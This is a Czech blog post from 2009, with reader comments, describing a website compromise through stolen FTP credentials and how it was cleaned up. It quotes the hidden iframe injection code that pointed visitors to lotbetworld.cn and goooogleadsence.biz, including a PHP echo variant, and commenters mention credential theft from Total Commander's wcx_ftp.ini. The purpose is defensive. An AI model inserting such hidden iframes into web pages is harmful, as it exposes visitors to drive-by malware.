Byli jsme hacknuti!

Ano, je to tak, celý web včetně všech našich subdomén byl hacknutý nějakým podivným virem. V sobotu ráno koukám na web – a co nevidím, na stránkách se nacházely podivné změny v podobě chyb v CSS a různě rozhozené elementy stránek. Rozhodl jsem se o tom napsat přímo článek do blogu, aby uživatelé měli zdroj, kde získají rady k odstranění onoho viru, neboť  jsem v českém internetovém prostředí žádný takový zatím nenašel.

Nicméně, přišlo mi to velice prazvláštní, myslel jsem si, že někdo pravděpodobně vytvořil chybu při úpravách webu. Každopádně jsem otevřel CSS soubory a vše zase rychle spravil; ale nedalo mi to a pátral jsem po příčině. Co by Vás napadlo jako první? Kouknout se do „zdrojáku” a najít nějaké neobvyklé řádky nebo něco, co tam nemá vůbec co dělat? To jsem přesně udělal. Začal jsem si projíždět kód a samozřejmě jsem narazil na něco opravdu zvláštního, v kódu byl kus neznámého kódu a vypadal přesně takto:

<iframe src="http://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>

Tak v tu chvíli mi bylo hned jasné, co se děje, někdo se nám hacknul na „ftýpko” a vir už byl na světě. Po hlubší analýze jsem zjistil, že byly infikovány všechny index.php stránky na celé doméně včetně subdomén. Rázem mi bylo zřejmé, že se nejedná o malou závadu, nýbrž o záležitost, u níž strávím sobotní odpoledne.

V kódu to vypadalo zhruba takto:

V záhlaví bylo vždy:

<iframe src="http://lotbetworld.cn/in.cgi?income36" width=1 height=1 style="visibility: hidden"></iframe>

A v zápatí toto:

<iframe src="http://goooogleadsence.biz/?click=781BDE1" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Anebo přímo u php

echo "<iframe src=\"http://goooogleadsence.biz/?click=79828C5\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

Že bych z toho všeho měl radost, to se říct nedalo; ještě k tomu víkend před sebou, naplánované akce, no trochu mi to znepříjemnilo začátek dne. Nejhorší na tom bylo, že kdokoliv používal např. Avast!,  virus mu to na našem webu hlásilo, takže si asi dokážete představit, jak bezmocně se v téhle situaci člověk cítí.

No abych to ujasnil, opravdu se mi honily hlavou všechny tyto následující hrozby:

  • ztráta návštěvníků
  • negativní branding
  • ban od vyhledávačů a šup do blacklistu
  • riziko nějaké větší škody

Takže jsem z toho nebyl pochopitelně vůbec veselý, a navíc jsem netušil, jak dlouho bude trvat, než se vše odstraní. Nuže udělal jsem to, co by asi učinil každý – začal jsem googlit a nalezl pár webů, kterým se stalo to samé. Každopádně jsem nenašel v českém prostředí článek na téma tohoto typu hacku, a proto jsem se rozhodl o tom napsat sám a podělit se se čtenáři o nepříjemnou zkušenost.

O viru jsem zjistil následující informace:

  • Údajně se jedná o červa, který je zabydlen ve Vašem počítači.
  • Snaží se uhádnout přístupy k  FTP z Vašeho počítače pomocí botnetů, které údajně podle předem připravených pravidel zkoušejí zjistit údaje k FTP.
  • Poté, co virus hesla získá, vloží do „indexů” výše uvedené kódy.

Podle našeho web providera je prakticky nemožné tyto botnety rozeznat z logů, jelikož to prý zkouší vždy jen z jedné IP a pouze párkrát denně, takže v logu to vypadá jen na běžného uživatele, který se prostě plete. Jediná prevence je měnit často hesla, dobře zabezpečit počítače a nepřipojovat se na FTP z veřejně přístupných počítačů.

Jak se zbavit této infekce?

1.       Změňte si  veškerá hesla týkající se přístupů k webovým souborům.

2.       Pokud nemáte uloženou zálohu všech souborů ještě před útokem, stáhněte si veškeré infikované soubory z FTP.

3.       Použitím nějakého dobrého antivirového programu pročistěte všechny počítače skrze centrální, kterým se Vy nebo Vaši pracovníci logují na FTP.

4.       Poté hledejte různá klíčová slova, která jsou specifická k tomu infikovanému kódu (např. Iframe, goooogleadsence.biz, /?click) a ta z kódu odstraňte

5.       Pak soubory nahrajte zpátky na server.

V tu chvíli by se mělo všechno vrátit do normálu. Snažte se vše udělat co nejrychleji. Největší riziko je asi ban od vyhledávačů; všechna ta tvrdá práce může být najednou fuč.  Asi po 3 hodinách jsem virus odstranil a vše bylo opět v pořádku, takže jsem měl po zbytek víkendu klidnou hlavu.

No každopádně, pokud chcete vědět, jestli Vaše stránky vidí Google jako spam, stačí použít buď webmasters tools, nebo zadat do Vašeho prohlížeče toto url: http://www.google.com/safebrowsing/diagnostic?site=http://www.vasedomena.cz

Snad už se s tímto problémem nebudu potýkat. Pokud jste se i Vy setkali se spamem a hacknutím, zanechte prosím v diskuzi  komentář a podělte se o Vaše zkušenosti, klidně i o případné rady.

Odkazy na jiné zdroje (AJ):

http://www.nazieb.com/466/blocks-the-annoying-goooogleadsencebiz-iframe

http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/

http://googlewebmastercentral.blogspot.com/2008/04/my-sites-been-hacked-now-what.html

Komentáře (19)

Michal | April 15th, 2009 @ 13:33:

Snaží se uhádnout přístupy k FTP z Vašeho počítače pomocí botnetů
Nebo si najde soubor wcx_ftp.ini a připojí se napoprvé 🙂

Jirka | April 15th, 2009 @ 13:37:

Jak píše Michal, červi zneužívají přístupových údajů, které jsou uloženy v wcx_ftp.ini. Proto neukládejte v TC hesla, není to bezpečné…

Miroslav Stibůrek | April 15th, 2009 @ 13:43:

Děkuji Vám za přínosné informace, velmi užitečné pro nás i pro čtenáře.

Matej | April 15th, 2009 @ 13:54:

Stalo se nam to podobne, zmenili sme hesla, vycistili a sup stalo se to znova. Nakonec sme zjistili, ze jeden z vyvojaru mel napadeny pocitac cervem. Tzn nova hesla se stale nekomu posilala. Cerv zjistuje hesla vsude mozne, jedna cast i z TC.

bzuK | April 15th, 2009 @ 14:02:

Taky se nám to minulý týden stalo. Ta samá příčina – FTP uložená v Total Commanderu u jednoho bývalého zaměstnance.

Pokud máte všechny klienty na jednom serveru nebo u jednoho hostera, je situace jednodušší, administrátor vám může výskyty takových iframů vyhledat a následně odmazat přímo na serveru.

Další ochrana kterou jsme si nechali nasadit je blokování přístupů na FTP ze zahraničních IP adres.

Miroslav Stibůrek | April 15th, 2009 @ 19:14:

Opět perfektní informace, díky. Je to opravdu pakárna, naštěstí se jednalo pouze o jeden FTP server. Každopádně, blokování přístupů na FTP ze zahraničních IP zní jako suprová věc, pokud to tedy lze povolit i pro specifické země.

Gusta | April 15th, 2009 @ 20:03:

A vir zde mate stale. Pri vstupu na stranku mi jej AVG nahlasilo. Takze se vam zrejme nepovedlo jej uplne odstranit.

Roman | April 16th, 2009 @ 09:49:

Taky se mi to před časem stalo. “Vir” napadl všechny PHP skripty a hned na úvod vložil zmiňovaný iframe.

Zajímavé bylo to, že napadl jen ty skripty, které měly zápisová práva širší než jen na samotného vlastníka. Takže na svých webech jsem moc práce s opravou neměl.
Moje heslo k FTP ten vir neměl a brousil si po serveříku jinak. Spíš mi to přišlo jako že nějak zneužil možnost nahrát soubor na server přes web, nahrál se tam, spustil se a editoval PHP skripty, které upravovat šly.

Admin žádnou podezřelou aktivitu na serveru nezjistil. Nikdo podezřelý se přes tu noc nepřihlásil.

Miroslav Stibůrek | April 17th, 2009 @ 11:10:

V posledních pár týdnech se to opravdu rozrostlo. Každopádně je zajímavé jak se takový vir dokáže šířit. Nikdo z nás TC nevyužívá, takže se muselo jednat o nějaký loop-hole v softwaru. Nicméně, díky Romane i tobě za podělení se o zkušenost.

Tomáš Hlaváček | April 20th, 2009 @ 06:56:

Taky se nám u části klientů stalo totéž – opravdu to bylo nedokonale zabezpečeným počítačem a šlo jen o weby, ke kterým byla hesla uložena v Total Commanderu – kromě změny hesel jsme nainstalovali také firewall na serveru, který hlídá připojení k FTP a nepouští k nám nikoho kromě vybraných IP adres, to ten vir zatím překonat neumí. Znáte někdo nějakého podobného souorového manažera s funkcemi TC a šifrovaným souborem pro hesla k FTP – přeci jen soubor s hesly v plain textu v TC si to sám říká, takže to podle mě byla jen otázka času…

Homer | April 28th, 2009 @ 14:00:

Na jednom webu se mi stalo to samé. Vymazal jsem všechna hesla u FTP připojení v TC a od té doby je klid.

google pagerank | May 8th, 2009 @ 08:05:

hacknuto bylo plno webů. v práci jsem zaznamenal například jednu místní cestovku. sám jsem nikdy hesla v total commanderu neukládal, prostě bezpečnostní riziko.

Tukan | May 14th, 2009 @ 09:39:

Začínám se bát ukládat hesla…

Miroslav Stibůrek | May 14th, 2009 @ 12:28:

Asi tak, člověk už se bojí i si něco uložit. No každopádně v dubnu i v květnu jsou ty ataky opravdu nehorázné, snad už jejich nával skončil.

Tomáš H: To zní jako perfektní věc si to takhle ošetřit, problém pak je vyřešen.

michal pesat | June 8th, 2009 @ 14:17:

zdarec, já mam ještě pikantnější problém, používám FREE FTP COMMANDER, hesla si já ani nikdo jiný neukládá a ESET mi hlásí, že je můj komp čistej, nikdo jinej to FTP z těch hacknutých stránek nepoužívá, nevíte, kde může bejt zakopanej pes? já si osobně myslím, že mám v pc nějakýho červa, co mi odhaluje stisky kláves nebo tak něco, ptze hesla k FTP ted měním každý den 2x a uz jsem z toho docela zoufalej, do zdrojáku mi to háže: viagra document.getElementById('linksDKmkmad').style.display ='none'; , hesla jsou vždy minimálně 20místná a obsahují složité znaky jako *&%/; atd… děkuji za rady michal

Miroslav Stibůrek | June 10th, 2009 @ 09:55:

Ahoj, to je opravdu pikátní problém. Je možné, že máš v počítači virus zvaný keylogger, který ti tak jak říkáš, čte všechny tvé stisky na klávesnici. Takže tedy si tento kód ze stránek odstranil, teď už měníš hesla velmi často a stále se tam vkládá kód? Buď máš keylogger v PC, nebo na FTP máš stále pozůstatky viru, který se neustále regeneruje. Zkus se i podívat jestli na serveru nemáš nějaké soubory, které tam nemají co dělat, nikoli pouze nevyžádaný kód v souborech.

Tomáš Hlaváček | June 10th, 2009 @ 10:16:

Nebo je také docela dobře možné, že máš přímo na serveru nahranou nějakou BACKDOOR stránku – tedy kus PHP nebo javascript kódu, který útočníkovi umožňuje přístup na server bez znalosti hesla k FTP – může to být i zašifrované, takže funkčnost nepoznáš hned na první pohled – doporučuji porovnat zálohu stavu obsahu serveru k nějakému staršímu datu pár týdnů před tím, než se projevil tenhle problém se současným stavem a zkontrolovat nové soubory a změněné soubory – své úpravy jistě poznáš, vše ostatní je podezřelé 🙂 Asi to bude pěkná piplačka.

A pak bych doporučil na pár dní vypnout FTP přístup – tedy pokud je server tvůj a ne jen nějaký virtuální…

Štefan Ihnat | July 19th, 2009 @ 20:24:

S virem mam taky svoji nemalou zkusenost 🙂 Smazal jsem kompletne pristupy v Total Commanderu .. a nechal pocitac projet Free Avastem ..

Po vycisteni uz je vse v pohode (tak dva tydny) a to uz tam mam zase hesla k par uctum ulozena ..


Pingbacks

  1. 6 odkazů jak si poradit se zákeřným virem vykrádájící hesla z Total Commanderu | Pari - weblog o webdesignu a všem možném

Zanechte komentář




Pravdepodobne nemate nainstalovany flash player. Stahnete si ho a nainstalujte. Adobe Flash Player